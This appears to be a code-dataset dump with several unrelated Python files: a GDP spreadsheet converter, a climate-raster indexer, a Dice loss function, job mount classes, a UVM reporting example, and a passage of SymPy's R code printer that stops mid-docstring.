id stringlengths 1 265 | text stringlengths 6 5.19M | dataset_id stringclasses 7
values |
|---|---|---|
1792477 | # this could easily be accomplished with a simple cut/paste transpose
# why am I making this more work than it needs to be?!
import os
import sys
import csv
import datetime
import subprocess
from collections import OrderedDict
from openpyxl import Workbook, load_workbook
os.chdir(os.path.dirname(os.path.abspath(__file__)))
GDP_PATH = "../data/raw/world_bank/"
OUTPUT_PATH = "../data/interim/"
GDP_FILE = "API_NY.GDP.MKTP.KD.ZG_DS2_en_excel_v2_422103.xls"
OUTPUT_FILE = "gdp.xlsx"
# requires libreoffice to be installed :-/
if not os.path.exists(OUTPUT_PATH):
os.makedirs(OUTPUT_PATH)
subprocess.run([
"soffice",
"--headless",
"--convert-to",
"xlsx",
os.path.join(GDP_PATH, GDP_FILE),
"--outdir",
OUTPUT_PATH
])
fpath = os.path.join(OUTPUT_PATH, GDP_FILE) + "x"
wb = load_workbook(filename=fpath, data_only=True)
data_idx = -1
for idx, sheetname in enumerate(wb.sheetnames):
if sheetname == "Data":
data_idx = idx
break
if data_idx == -1:
print("ERROR! Couldn't find data sheet.")
sys.exit(1)
data_sheet = wb.worksheets[data_idx]
output_wb = Workbook()
output_ws = output_wb.active
output_ws.title = "GDP Growth"
output_ws.cell(row=1, column=1, value="Year")
output_ws.cell(row=1, column=2, value="GDP_Growth")
# data starts at column 6 (F), labels in row 4; US in row 254
out_row = 2
for cell in data_sheet[254]:
if cell.column < 6:
continue
year = data_sheet.cell(row=4, column=cell.column).value
gdp_growth = cell.value
output_ws.cell(row=out_row, column=1, value=year)
output_ws.cell(row=out_row, column=2, value=gdp_growth)
out_row += 1
output_wb.save(os.path.join(OUTPUT_PATH, OUTPUT_FILE))
| StarcoderdataPython |
4811321 | <reponame>brandon-edwards/openfl
# Copyright (C) 2020-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
"""Assigner package."""
from .assigner import Assigner
from .random_grouped_assigner import RandomGroupedAssigner
from .static_grouped_assigner import StaticGroupedAssigner
__all__ = [
'Assigner',
'RandomGroupedAssigner',
'StaticGroupedAssigner',
]
| StarcoderdataPython |
4807361 | <filename>scripts/climdata_to_csv.py
"""
A directory of climate data -> a json describing it
keys:
rcp
period
model
variable
filepath
month
units
"""
import os
import pandas
from glob import glob
from rasterstats import zonal_stats
from itertools import chain
worldclim_dir = "/Users/mperry/data/worldclim"
def past_rasts():
past_dir = os.path.join(worldclim_dir, 'past')
for prast in glob(past_dir + "/*.tif"):
base = os.path.basename(prast)
name, _ = os.path.splitext(base)
model = name[0:2]
period = name[2:5]
var = name[5:7]
if var != 'bi':
month = int(name[7:])
else:
month = 0
var = var + name[7:]
data = {
'rcp': 'na',
'period': period,
'model': model,
'month': month,
'variable': var,
'path': prast
}
yield data
def future_rasts():
future_dir = os.path.join(worldclim_dir, 'future')
for rast in glob(future_dir + "/*.tif"):
base = os.path.basename(rast)
name, _ = os.path.splitext(base)
model = name[0:2]
rcp = name[2:4]
var = name[4:6]
period = name[6:8]
if var != 'bi':
month = int(name[8:])
else:
month = 0
var = var + name[8:]
data = {
'rcp': rcp,
'period': period,
'model': model,
'month': month,
'variable': var,
'path': rast
}
yield data
def current_rasts():
current_dir = os.path.join(worldclim_dir, 'current')
# ESRI Grids, not geotiffs
variables = {
'tmax': 'tx',
'tmin': 'tn',
'prec': 'pr',
'bio': 'bi',
}
for customvar, var in variables.items():
path_tmp = os.path.join(current_dir, customvar, customvar + "_*")
for rast in glob(path_tmp):
num = os.path.basename(rast).split("_")[1]
if var != 'bi':
month = int(num)
else:
month = 0
var = var + num
data = {
'rcp': 'na',
'period': 'current',
'model': 'na',
'month': month,
'variable': var,
'path': rast + "/hdf.adf"
}
yield data
def get_dataframe():
all_data = chain(past_rasts(), future_rasts(), current_rasts())
return pandas.DataFrame(list(all_data))
if __name__ == "__main__":
df = get_dataframe()
df.to_csv("climate_data.csv", index=False)
# df = pandas.read_csv("climate_data.csv")
# import ipdb; ipdb.set_trace()
| StarcoderdataPython |
1747412 | <reponame>mistermoutan/ModelsGenesis
import torch
class DiceLoss:
@staticmethod
def dice_loss(pred, target, smooth=0, eps=1e-7, return_loss=True, skip_zero_sum: bool = True, per_class=False):
"""
pred: tensor with first dimension as batch
target: tensor with first dimension as batch
VERIFIED THAT WORKS EXACT SAME AS ACS soft dice except that they do not square the logits in the denominator and skip a channle computation if the sum of target for that specific channel is 0
EVEN THEIR DICE GLOBAL IS THE SAME FOR 1 CHANNEL OUTPUTS THAT ARE BINARY
"""
if not torch.is_tensor(pred) or not torch.is_tensor(target):
raise TypeError("Input type is not a torch.Tensor. Got {} and {}".format(type(pred), type(target)))
if len(pred.shape) not in (3, 4, 5):
raise ValueError("Invalid input shape, we expect BxCxHxWxD. Got: {}".format(pred.shape))
if not (pred.shape == target.shape):
raise ValueError("input and target shapes must be the same. Got: {} and {}".format(pred.shape, target.shape))
if not pred.device == target.device:
raise ValueError("input and target must be in the same device. Got: {} and {}".format(pred.device, target.device))
pred_shape = pred.shape
# for i_class in range(n_classes):
# if targets[:,i_class].sum()>0:
# loss += dice_loss_perclass(probs[:,i_class], targets[:,i_class], smooth)
# return loss / n_classes
list_of_flattened_channels = []
if len(pred.shape) != 3:
for channel_idx in range(pred_shape[1]):
# if skip_zero_sum is True:
if target[:, channel_idx].sum() <= 0:
# only 0's in target, may come from patching of task02
print("0 ONLY IN THIS CHANNEL OF TARGET")
# raise ValueError
# continue
iflat = pred[:, channel_idx].contiguous().view(-1) # consider 1 channel N x C x H x D X W -> N x H x D x W
tflat = target[:, channel_idx].contiguous().view(-1)
list_of_flattened_channels.append((iflat, tflat))
else:
iflat = pred.contiguous().view(-1) # comes as (x,y,z) so flatten everything
tflat = target.contiguous().view(-1)
list_of_flattened_channels.append((iflat, tflat))
dice = 0
dice_list = []
for iflat, tflat in list_of_flattened_channels:
intersection = torch.sum(iflat * tflat)
A_sum_sq = torch.sum(iflat * iflat)
B_sum_sq = torch.sum(tflat * tflat)
add = (2.0 * intersection + smooth + eps) / (A_sum_sq + B_sum_sq + eps)
dice += add
assert 0 <= add <= 1, "{}".format(add)
if per_class:
dice_list.append((2.0 * intersection + smooth + eps) / (A_sum_sq + B_sum_sq + eps))
dice /= len(list_of_flattened_channels)
if per_class and len(dice_list) > 1:
dice_list.append(dice) # final is average dice #should consider global dice?
if not per_class:
return 1 - dice if return_loss else dice
if per_class:
if return_loss:
ret = [1 - i for i in dice_list]
return ret
else:
return dice_list
if __name__ == "__main__":
loss = DiceLoss.dice_loss
import numpy as np
# a = np.random.rand(6,2)
for _ in range(1000):
a = np.ones((6, 1, 64, 64, 32))
b = np.ones((6, 1, 64, 64, 32))
a = torch.Tensor(a)
b = torch.Tensor(b)
l = loss(a, b)
print(type(l))
exit(0)
if loss(a, b) > 0.8:
# print(a)
# print(b)
pass
""" def compute_dice_coefficient(mask_gt, mask_pred):
Compute soerensen-dice coefficient.
compute the soerensen-dice coefficient between the ground truth mask `mask_gt`
and the predicted mask `mask_pred`.
Args:
mask_gt: 3-dim Numpy array of type bool. The ground truth mask.
mask_pred: 3-dim Numpy array of type bool. The predicted mask.
Returns:
the dice coeffcient as float. If both masks are empty, the result is NaN
volume_sum = mask_gt.sum() + mask_pred.sum()
if volume_sum == 0:
return np.NaN
volume_intersect = (mask_gt & mask_pred).sum()
return 2*volume_intersect / volume_sum """
r"""
def dice_loss(input, target):
smooth = 1.
iflat = input.view(-1)
tflat = target.view(-1)
intersection = (iflat * tflat).sum()
return 1 - ((2. * intersection + smooth) /
(iflat.sum() + tflat.sum() + smooth))
-------------------
class DiceLoss(nn.Module):
def __init__(self):
super(DiceLoss, self).__init__()
def forward(self, input, target):
N = target.size(0)
smooth = 1
input_flat = input.view(N, -1)
target_flat = target.view(N, -1)
intersection = input_flat * target_flat
loss = 2 * (intersection.sum(1) + smooth) / (input_flat.sum(1) + target_flat.sum(1) + smooth)
loss = 1 - loss.sum() / N
return loss
----------------------------------------------------
def dice_loss(true, logits, eps=1e-7):
Computes the Sørensen–Dice loss.
Note that PyTorch optimizers minimize a loss. In this
case, we would like to maximize the dice loss so we
return the negated dice loss.
Args:
true: a tensor of shape [B, 1, H, W].
logits: a tensor of shape [B, C, H, W]. Corresponds to
the raw output or logits of the model.
eps: added to the denominator for numerical stability.
Returns:
dice_loss: the Sørensen–Dice loss.
num_classes = logits.shape[1]
if num_classes == 1:
true_1_hot = torch.eye(num_classes + 1)[true.squeeze(1)]
true_1_hot = true_1_hot.permute(0, 3, 1, 2).float()
true_1_hot_f = true_1_hot[:, 0:1, :, :]
true_1_hot_s = true_1_hot[:, 1:2, :, :]
true_1_hot = torch.cat([true_1_hot_s, true_1_hot_f], dim=1)
pos_prob = torch.sigmoid(logits)
neg_prob = 1 - pos_prob
probas = torch.cat([pos_prob, neg_prob], dim=1)
else:
true_1_hot = torch.eye(num_classes)[true.squeeze(1)]
true_1_hot = true_1_hot.permute(0, 3, 1, 2).float()
probas = F.softmax(logits, dim=1)
true_1_hot = true_1_hot.type(logits.type())
dims = (0,) + tuple(range(2, true.ndimension()))
intersection = torch.sum(probas * true_1_hot, dims)
cardinality = torch.sum(probas + true_1_hot, dims)
dice_loss = (2. * intersection / (cardinality + eps)).mean()
return (1 - dice_loss)
------------------------------
from typing import Optional
import torch
import torch.nn as nn
import torch.nn.functional as F
from kornia.utils import one_hot
# based on:
# https://github.com/kevinzakka/pytorch-goodies/blob/master/losses.py
[docs]
class DiceLoss(nn.Module):
Criterion that computes Sørensen-Dice Coefficient loss.
According to [1], we compute the Sørensen-Dice Coefficient as follows:
.. math::
\text{Dice}(x, class) = \frac{2 |X| \cap |Y|}{|X| + |Y|}
where:
- :math:`X` expects to be the scores of each class.
- :math:`Y` expects to be the one-hot tensor with the class labels.
the loss, is finally computed as:
.. math::
text{loss}(x, class) = 1 - \text{Dice}(x, class)
[1] https://en.wikipedia.org/wiki/S%C3%B8rensen%E2%80%93Dice_coefficient
Shape:
- Input: :math:`(N, C, H, W)` where C = number of classes.
- Target: :math:`(N, H, W)` where each value is
:math:`0 ≤ targets[i] ≤ C−1`.
Examples:
N = 5 # num_classes
loss = kornia.losses.DiceLoss()
input = torch.randn(1, N, 3, 5, requires_grad=True)
target = torch.empty(1, 3, 5, dtype=torch.long).random_(N)
output = loss(input, target)
output.backward()
def __init__(self) -> None:
super(DiceLoss, self).__init__()
self.eps: float = 1e-6
def forward( # type: ignore
self,
input: torch.Tensor,
target: torch.Tensor) -> torch.Tensor:
if not torch.is_tensor(input):
raise TypeError("Input type is not a torch.Tensor. Got {}"
.format(type(input)))
if not len(input.shape) == 4:
raise ValueError("Invalid input shape, we expect BxNxHxW. Got: {}"
.format(input.shape))
if not input.shape[-2:] == target.shape[-2:]:
raise ValueError("input and target shapes must be the same. Got: {}"
.format(input.shape, input.shape))
if not input.device == target.device:
raise ValueError(
"input and target must be in the same device. Got: {}" .format(
input.device, target.device))
# compute softmax over the classes axis
input_soft = F.softmax(input, dim=1)
# create the labels one hot tensor
target_one_hot = one_hot(target, num_classes=input.shape[1],
device=input.device, dtype=input.dtype)
# compute the actual dice score
dims = (1, 2, 3)
intersection = torch.sum(input_soft * target_one_hot, dims)
cardinality = torch.sum(input_soft + target_one_hot, dims)
dice_score = 2. * intersection / (cardinality + self.eps)
return torch.mean(torch.tensor(1.) - dice_score)
######################
# functional interface
######################
[docs]
def dice_loss(
input: torch.Tensor,
target: torch.Tensor) -> torch.Tensor:
rFunction that computes Sørensen-Dice Coefficient loss.
See :class:`~kornia.losses.DiceLoss` for details.
return DiceLoss()(input, target)
----------------------------
def dice_loss(input,target):
input is a torch variable of size BatchxnclassesxHxW representing log probabilities for each class
target is a 1-hot representation of the groundtruth, shoud have same size as the input
assert input.size() == target.size(), "Input sizes must be equal."
assert input.dim() == 4, "Input must be a 4D Tensor."
uniques=np.unique(target.numpy())
assert set(list(uniques))<=set([0,1]), "target must only contain zeros and ones"
probs=F.softmax(input)
num=probs*target#b,c,h,w--p*g
num=torch.sum(num,dim=3)#b,c,h
num=torch.sum(num,dim=2)
den1=probs*probs#--p^2
den1=torch.sum(den1,dim=3)#b,c,h
den1=torch.sum(den1,dim=2)
den2=target*target#--g^2
den2=torch.sum(den2,dim=3)#b,c,h
den2=torch.sum(den2,dim=2)#b,c
dice=2*(num/(den1+den2))
dice_eso=dice[:,1:]#we ignore bg dice val, and take the fg
dice_total=-1*torch.sum(dice_eso)/dice_eso.size(0)#divide by batch_sz
-----------------------------
def dice_loss(pred, target):
This definition generalize to real valued pred and target vector.
This should be differentiable.
pred: tensor with first dimension as batch
target: tensor with first dimension as batch
smooth = 1.
# have to use contiguous since they may from a torch.view op
iflat = pred.contiguous().view(-1)
tflat = target.contiguous().view(-1)
intersection = (iflat * tflat).sum()
A_sum = torch.sum(tflat * iflat)
B_sum = torch.sum(tflat * tflat)
return 1 - ((2. * intersection + smooth) / (A_sum + B_sum + smooth) )
---------------------------------
"""
| StarcoderdataPython |
1640569 | """
These objects are pointers to code/data you wish to give access
to a launched job.
Each object defines a source and a mount point (where the directory will be visible
to the launched process)
"""
import os
import tarfile
import tempfile
from contextlib import contextmanager
class Mount(object):
"""
Args:
mount_point (str): Location of directory visible to the running process
pythonpath (bool): If True, adds this folder to the $PYTHON_PATH environment variable
output (bool): If False, this is a "code" directory. If True, this should be an empty
"output" directory (nothing will be copied to remote)
"""
def __init__(self, mount_point=None, pythonpath=False, output=False):
self.pythonpath = pythonpath
self.read_only = not output
self.set_mount(mount_point)
self.path_on_remote = None
self.local_file_hash = None
def set_mount(self, mount_point):
if mount_point:
self.mount_point = mount_point
else:
self.mount_point = mount_point
class MountLocal(Mount):
def __init__(self, local_dir, mount_point=None, cleanup=True,
filter_ext=('.pyc', '.log', '.git', '.mp4', '.idea'),
filter_dir=('data',),
**kwargs):
super(MountLocal, self).__init__(mount_point=mount_point, **kwargs)
self.local_dir = os.path.realpath(os.path.expanduser(local_dir))
self.local_dir_raw = local_dir
self.cleanup = cleanup
self.filter_ext = filter_ext
self.filter_dir = filter_dir
if mount_point is None:
self.set_mount(local_dir)
self.no_remount = True
else:
self.no_remount = False
#print('local_dir %s, mount_point %s(%s)' % (self.local_dir, self.mount_point, mount_point))
def create_if_nonexistent(self):
os.makedirs(self.local_dir, exist_ok=True)
@contextmanager
def gzip(self):
"""
Return filepath to a gzipped version of this directory for uploading
"""
assert self.read_only
def filter_func(tar_info):
filt = any([tar_info.name.endswith(ext) for ext in self.filter_ext]) or any([ tar_info.name.endswith('/'+ext) for ext in self.filter_dir])
if filt:
return None
return tar_info
with tempfile.NamedTemporaryFile('wb+', suffix='.tar') as tf:
# make a tar.gzip archive of directory
with tarfile.open(fileobj=tf, mode="w") as tar:
#tar.add(self.local_dir, arcname=os.path.splitext(os.path.basename(tf.name))[0], filter=filter_func)
tar.add(self.local_dir, arcname=os.path.basename(self.local_dir), filter=filter_func)
tf.seek(0)
yield tf.name
def __str__(self):
return 'MountLocal@%s'%self.local_dir
def mount_dir(self):
return os.path.join('/mounts', self.mount_point.replace('~/',''))
class MountGitRepo(Mount):
def __init__(self, git_url, git_credentials=None, **kwargs):
super(MountGitRepo, self).__init__(read_only=True, **kwargs)
self.git_url = git_url
self.git_credentials = git_credentials
raise NotImplementedError()
class MountGCP(Mount):
def __init__(self, gcp_path, gcp_bucket_name, sync_interval=15, output=False,
include_types=('*.txt', '*.csv', '*.json', '*.gz', '*.tar', '*.log', '*.pkl'), **kwargs):
super(MountGCP, self).__init__(**kwargs)
self.gcp_bucket_name = gcp_bucket_name
self.gcp_path = gcp_path
self.output = output
self.sync_interval = sync_interval
self.sync_on_terminate = True
self.include_types = include_types
def __str__(self):
return 'MountGCP@gcp://%s/%s'% (self.gcp_bucket_name, self.gcp_path)
@property
def include_string(self):
return ' '.join(['--include \'%s\''%type_ for type_ in self.include_types])
class MountS3(Mount):
def __init__(self, s3_path, s3_bucket=None, sync_interval=15, output=False,
include_types=('*.txt', '*.csv', '*.json', '*.gz', '*.tar', '*.log', '*.pkl'), **kwargs):
super(MountS3, self).__init__(**kwargs)
if s3_bucket is None:
# load from config
from doodad.ec2.autoconfig import AUTOCONFIG
s3_bucket = AUTOCONFIG.s3_bucket()
self.s3_bucket = s3_bucket
self.s3_path = s3_path
self.output = output
self.sync_interval = sync_interval
self.sync_on_terminate = True
self.include_types = include_types
def __str__(self):
return 'MountS3@s3://%s/%s'% (self.s3_bucket, self.s3_path)
@property
def include_string(self):
return ' '.join(['--include \'%s\''%type_ for type_ in self.include_types])
| StarcoderdataPython |
3360602 | <gh_stars>100-1000
#
#//----------------------------------------------------------------------
#// Copyright 2007-2010 Mentor Graphics Corporation
#// Copyright 2007-2010 Cadence Design Systems, Inc.
#// Copyright 2010-2011 Synopsys, Inc.
#// Copyright 2019-2020 <NAME> (tpoikela)
#// All Rights Reserved Worldwide
#//
#// Licensed under the Apache License, Version 2.0 (the
#// "License"); you may not use this file except in
#// compliance with the License. You may obtain a copy of
#// the License at
#//
#// http://www.apache.org/licenses/LICENSE-2.0
#//
#// Unless required by applicable law or agreed to in
#// writing, software distributed under the License is
#// distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
#// CONDITIONS OF ANY KIND, either express or implied. See
#// the License for the specific language governing
#// permissions and limitations under the License.
#//----------------------------------------------------------------------
# About: UVM Reporting methods
# This example will illustrate the usage of UVM reporting functions,
# and mainly focusing on the fine-tuning of reporting
# To get more details about the reporting related methods, check the file:
# - uvm/src/base/uvm_report_object.py
# - uvm/src/base/uvm_component.py - Hierarchical reporting methods
import cocotb
from cocotb.triggers import Timer
from uvm.macros import uvm_component_utils, uvm_info
from uvm import (UVMCoreService, UVMComponent, UVM_MEDIUM, sv, UVMTest,
run_test, UVM_LOW, UVM_LOG, UVM_DISPLAY, UVM_INFO, UVMReportCatcher)
class my_child(UVMComponent):
def __init__(self, name, parent):
super().__init__(name, parent)
self.tag = "MY_CHILD"
async def main_phase(self, phase):
uvm_info(self.tag, 'main_phase started in child', UVM_MEDIUM)
def get_packet(self):
uvm_info("PKTGEN", sv.sformatf("Getting a packet from %s (%s)",
self.get_full_name(), self.get_type_name()), UVM_MEDIUM)
return super().get_packet()
# Use the macro in a class to implement factory registration along with other
# utilities (create, get_type_name). To just do factory registration, use the
# macro `uvm_object_registry(mygen,"mygen")
uvm_component_utils(my_child)
class my_top_test(UVMTest):
def __init__(self, name="my_top_test", parent=None):
super().__init__(name, parent)
self.tag = 'MY_TOP_TEST'
def build_phase(self, phase):
super().build_phase(phase)
self.child = my_child.type_id.create('my_child', self)
def connect_phase(self, phase):
self.def_file = open('uvm_master_log.log', 'w')
self.set_report_default_file_hier(self.def_file)
self.set_report_severity_action_hier(UVM_INFO, UVM_LOG | UVM_DISPLAY)
async def main_phase(self, phase):
phase.raise_objection(self, 'main_phase_started')
uvm_info(self.tag, 'main_phase started', UVM_MEDIUM)
await Timer(10, 'NS')
phase.drop_objection(self, 'main_phase_ending')
def final_phase(self, phase):
#uvm_info(self.tag, "Closing the file handle now", UVM_LOW)
self.def_file.close()
uvm_info(self.tag, "Closing the file handle now", UVM_LOW)
# Use the macro in after the class to implement factory registration along with other
# utilities (create, get_type_name).
uvm_component_utils(my_top_test)
@cocotb.test()
async def module_top(dut):
# cs_ = UVMCoreService.get() # type: UVMCoreService
# uvm_root = cs_.get_root()
# factory = cs_.get_factory()
# factory.print_factory(1)
# If a string is used to run_test, run_test will used the string based factory
# create method to create an object of the desired type.
await run_test("my_top_test")
| StarcoderdataPython |
4824574 | <filename>sympy/printing/rcode.py
"""
R code printer
The RCodePrinter converts single sympy expressions into single R expressions,
using the functions defined in math.h where possible.
"""
from __future__ import print_function, division
from sympy.codegen.ast import Assignment
from sympy.printing.codeprinter import CodePrinter
from sympy.printing.precedence import precedence, PRECEDENCE
from sympy.sets.fancysets import Range
# dictionary mapping sympy function to (argument_conditions, C_function).
# Used in RCodePrinter._print_Function(self)
known_functions = {
#"Abs": [(lambda x: not x.is_integer, "fabs")],
"Abs": "abs",
"sin": "sin",
"cos": "cos",
"tan": "tan",
"asin": "asin",
"acos": "acos",
"atan": "atan",
"atan2": "atan2",
"exp": "exp",
"log": "log",
"erf": "erf",
"sinh": "sinh",
"cosh": "cosh",
"tanh": "tanh",
"asinh": "asinh",
"acosh": "acosh",
"atanh": "atanh",
"floor": "floor",
"ceiling": "ceiling",
"sign": "sign",
"Max": "max",
"Min": "min",
"factorial": "factorial",
"gamma": "gamma",
"digamma": "digamma",
"trigamma": "trigamma",
"beta": "beta",
}
# These are the core reserved words in the R language. Taken from:
# https://cran.r-project.org/doc/manuals/r-release/R-lang.html#Reserved-words
reserved_words = ['if',
'else',
'repeat',
'while',
'function',
'for',
'in',
'next',
'break',
'TRUE',
'FALSE',
'NULL',
'Inf',
'NaN',
'NA',
'NA_integer_',
'NA_real_',
'NA_complex_',
'NA_character_',
'volatile']
class RCodePrinter(CodePrinter):
"""A printer to convert python expressions to strings of R code"""
printmethod = "_rcode"
language = "R"
_default_settings = {
'order': None,
'full_prec': 'auto',
'precision': 15,
'user_functions': {},
'human': True,
'contract': True,
'dereference': set(),
'error_on_reserved': False,
'reserved_word_suffix': '_',
}
_operators = {
'and': '&',
'or': '|',
'not': '!',
}
_relationals = {
}
def __init__(self, settings={}):
CodePrinter.__init__(self, settings)
self.known_functions = dict(known_functions)
userfuncs = settings.get('user_functions', {})
self.known_functions.update(userfuncs)
self._dereference = set(settings.get('dereference', []))
self.reserved_words = set(reserved_words)
def _rate_index_position(self, p):
return p*5
def _get_statement(self, codestring):
return "%s;" % codestring
def _get_comment(self, text):
return "// {0}".format(text)
def _declare_number_const(self, name, value):
return "{0} = {1};".format(name, value)
def _format_code(self, lines):
return self.indent_code(lines)
def _traverse_matrix_indices(self, mat):
rows, cols = mat.shape
return ((i, j) for i in range(rows) for j in range(cols))
def _get_loop_opening_ending(self, indices):
"""Returns a tuple (open_lines, close_lines) containing lists of codelines
"""
open_lines = []
close_lines = []
loopstart = "for (%(var)s in %(start)s:%(end)s){"
for i in indices:
# R arrays start at 1 and end at dimension
open_lines.append(loopstart % {
'var': self._print(i.label),
'start': self._print(i.lower+1),
'end': self._print(i.upper + 1)})
close_lines.append("}")
return open_lines, close_lines
def _print_Pow(self, expr):
if "Pow" in self.known_functions:
return self._print_Function(expr)
PREC = precedence(expr)
if expr.exp == -1:
return '1.0/%s' % (self.parenthesize(expr.base, PREC))
elif expr.exp == 0.5:
return 'sqrt(%s)' % self._print(expr.base)
else:
return '%s^%s' % (self.parenthesize(expr.base, PREC),
self.parenthesize(expr.exp, PREC))
def _print_Rational(self, expr):
p, q = int(expr.p), int(expr.q)
return '%d.0/%d.0' % (p, q)
def _print_Indexed(self, expr):
inds = [ self._print(i) for i in expr.indices ]
return "%s[%s]" % (self._print(expr.base.label), ", ".join(inds))
def _print_Idx(self, expr):
return self._print(expr.label)
def _print_Exp1(self, expr):
return "exp(1)"
def _print_Pi(self, expr):
return 'pi'
def _print_Infinity(self, expr):
return 'Inf'
def _print_NegativeInfinity(self, expr):
return '-Inf'
def _print_Assignment(self, expr):
from sympy.matrices.expressions.matexpr import MatrixSymbol
from sympy.tensor.indexed import IndexedBase
lhs = expr.lhs
rhs = expr.rhs
# We special case assignments that take multiple lines
#if isinstance(expr.rhs, Piecewise):
# from sympy.functions.elementary.piecewise import Piecewise
# # Here we modify Piecewise so each expression is now
# # an Assignment, and then continue on the print.
# expressions = []
# conditions = []
# for (e, c) in rhs.args:
# expressions.append(Assignment(lhs, e))
# conditions.append(c)
# temp = Piecewise(*zip(expressions, conditions))
# return self._print(temp)
#elif isinstance(lhs, MatrixSymbol):
if isinstance(lhs, MatrixSymbol):
# Here we form an Assignment for each element in the array,
# printing each one.
lines = []
for (i, j) in self._traverse_matrix_indices(lhs):
temp = Assignment(lhs[i, j], rhs[i, j])
code0 = self._print(temp)
lines.append(code0)
return "\n".join(lines)
elif self._settings["contract"] and (lhs.has(IndexedBase) or
rhs.has(IndexedBase)):
# Here we check if there is looping to be done, and if so
# print the required loops.
return self._doprint_loops(rhs, lhs)
else:
lhs_code = self._print(lhs)
rhs_code = self._print(rhs)
return self._get_statement("%s = %s" % (lhs_code, rhs_code))
def _print_Piecewise(self, expr):
# This method is called only for inline if constructs
# Top level piecewise is handled in doprint()
if expr.args[-1].cond == True:
last_line = "%s" % self._print(expr.args[-1].expr)
else:
last_line = "ifelse(%s,%s,NA)" % (self._print(expr.args[-1].cond), self._print(expr.args[-1].expr))
code=last_line
for e, c in reversed(expr.args[:-1]):
code= "ifelse(%s,%s," % (self._print(c), self._print(e))+code+")"
return(code)
def _print_ITE(self, expr):
from sympy.functions import Piecewise
_piecewise = Piecewise((expr.args[1], expr.args[0]), (expr.args[2], True))
return self._print(_piecewise)
def _print_MatrixElement(self, expr):
return "{0}[{1}]".format(self.parenthesize(expr.parent, PRECEDENCE["Atom"],
strict=True), expr.j + expr.i*expr.parent.shape[1])
def _print_Symbol(self, expr):
name = super(RCodePrinter, self)._print_Symbol(expr)
if expr in self._dereference:
return '(*{0})'.format(name)
else:
return name
def _print_Relational(self, expr):
lhs_code = self._print(expr.lhs)
rhs_code = self._print(expr.rhs)
op = expr.rel_op
return "{0} {1} {2}".format(lhs_code, op, rhs_code)
def _print_sinc(self, expr):
from sympy.functions.elementary.trigonometric import sin
from sympy.core.relational import Ne
from sympy.functions import Piecewise
_piecewise = Piecewise(
(sin(expr.args[0]) / expr.args[0], Ne(expr.args[0], 0)), (1, True))
return self._print(_piecewise)
def _print_AugmentedAssignment(self, expr):
lhs_code = self._print(expr.lhs)
op = expr.op
rhs_code = self._print(expr.rhs)
return "{0} {1} {2};".format(lhs_code, op, rhs_code)
def _print_For(self, expr):
target = self._print(expr.target)
if isinstance(expr.iterable, Range):
start, stop, step = expr.iterable.args
else:
raise NotImplementedError("Only iterable currently supported is Range")
body = self._print(expr.body)
return ('for ({target} = {start}; {target} < {stop}; {target} += '
'{step}) {{\n{body}\n}}').format(target=target, start=start,
stop=stop, step=step, body=body)
def indent_code(self, code):
"""Accepts a string of code or a list of code lines"""
if isinstance(code, str):
code_lines = self.indent_code(code.splitlines(True))
return ''.join(code_lines)
tab = " "
inc_token = ('{', '(', '{\n', '(\n')
dec_token = ('}', ')')
code = [ line.lstrip(' \t') for line in code ]
increase = [ int(any(map(line.endswith, inc_token))) for line in code ]
decrease = [ int(any(map(line.startswith, dec_token)))
for line in code ]
pretty = []
level = 0
for n, line in enumerate(code):
if line == '' or line == '\n':
pretty.append(line)
continue
level -= decrease[n]
pretty.append("%s%s" % (tab*level, line))
level += increase[n]
return pretty
def rcode(expr, assign_to=None, **settings):
"""Converts an expr to a string of r code
Parameters
==========
expr : Expr
A sympy expression to be converted.
assign_to : optional
When given, the argument is used as the name of the variable to which
the expression is assigned. Can be a string, ``Symbol``,
``MatrixSymbol``, or ``Indexed`` type. This is helpful in case of
line-wrapping, or for expressions that generate multi-line statements.
precision : integer, optional
The precision for numbers such as pi [default=15].
user_functions : dict, optional
A dictionary where the keys are string representations of either
``FunctionClass`` or ``UndefinedFunction`` instances and the values
are their desired R string representations. Alternatively, the
dictionary value can be a list of tuples i.e. [(argument_test,
rfunction_string)] or [(argument_test, rfunction_formater)]. See below
for examples.
human : bool, optional
If True, the result is a single string that may contain some constant
declarations for the number symbols. If False, the same information is
returned in a tuple of (symbols_to_declare, not_supported_functions,
code_text). [default=True].
contract: bool, optional
If True, ``Indexed`` instances are assumed to obey tensor contraction
rules and the corresponding nested loops over indices are generated.
Setting contract=False will not generate loops, instead the user is
responsible to provide values for the indices in the code.
[default=True].
Examples
========
>>> from sympy import rcode, symbols, Rational, sin, ceiling, Abs, Function
>>> x, tau = symbols("x, tau")
>>> rcode((2*tau)**Rational(7, 2))
'8*sqrt(2)*tau^(7.0/2.0)'
>>> rcode(sin(x), assign_to="s")
's = sin(x);'
Simple custom printing can be defined for certain types by passing a
dictionary of {"type" : "function"} to the ``user_functions`` kwarg.
Alternatively, the dictionary value can be a list of tuples i.e.
[(argument_test, cfunction_string)].
>>> custom_functions = {
... "ceiling": "CEIL",
... "Abs": [(lambda x: not x.is_integer, "fabs"),
... (lambda x: x.is_integer, "ABS")],
... "func": "f"
... }
>>> func = Function('func')
>>> rcode(func(Abs(x) + ceiling(x)), user_functions=custom_functions)
'f(fabs(x) + CEIL(x))'
or if the R-function takes a subset of the original arguments:
>>> rcode(2**x + 3**x, user_functions={'Pow': [
... (lambda b, e: b == 2, lambda b, e: 'exp2(%s)' % e),
... (lambda b, e: b != 2, 'pow')]})
'exp2(x) + pow(3, x)'
``Piecewise`` expressions are converted into conditionals. If an
``assign_to`` variable is provided an if statement is created, otherwise
the ternary operator is used. Note that if the ``Piecewise`` lacks a
default term, represented by ``(expr, True)`` then an error will be thrown.
This is to prevent generating an expression that may not evaluate to
anything.
>>> from sympy import Piecewise
>>> expr = Piecewise((x + 1, x > 0), (x, True))
>>> print(rcode(expr, assign_to=tau))
tau = ifelse(x > 0,x + 1,x);
Support for loops is provided through ``Indexed`` types. With
``contract=True`` these expressions will be turned into loops, whereas
``contract=False`` will just print the assignment expression that should be
looped over:
>>> from sympy import Eq, IndexedBase, Idx
>>> len_y = 5
>>> y = IndexedBase('y', shape=(len_y,))
>>> t = IndexedBase('t', shape=(len_y,))
>>> Dy = IndexedBase('Dy', shape=(len_y-1,))
>>> i = Idx('i', len_y-1)
>>> e=Eq(Dy[i], (y[i+1]-y[i])/(t[i+1]-t[i]))
>>> rcode(e.rhs, assign_to=e.lhs, contract=False)
'Dy[i] = (y[i + 1] - y[i])/(t[i + 1] - t[i]);'
Matrices are also supported, but a ``MatrixSymbol`` of the same dimensions
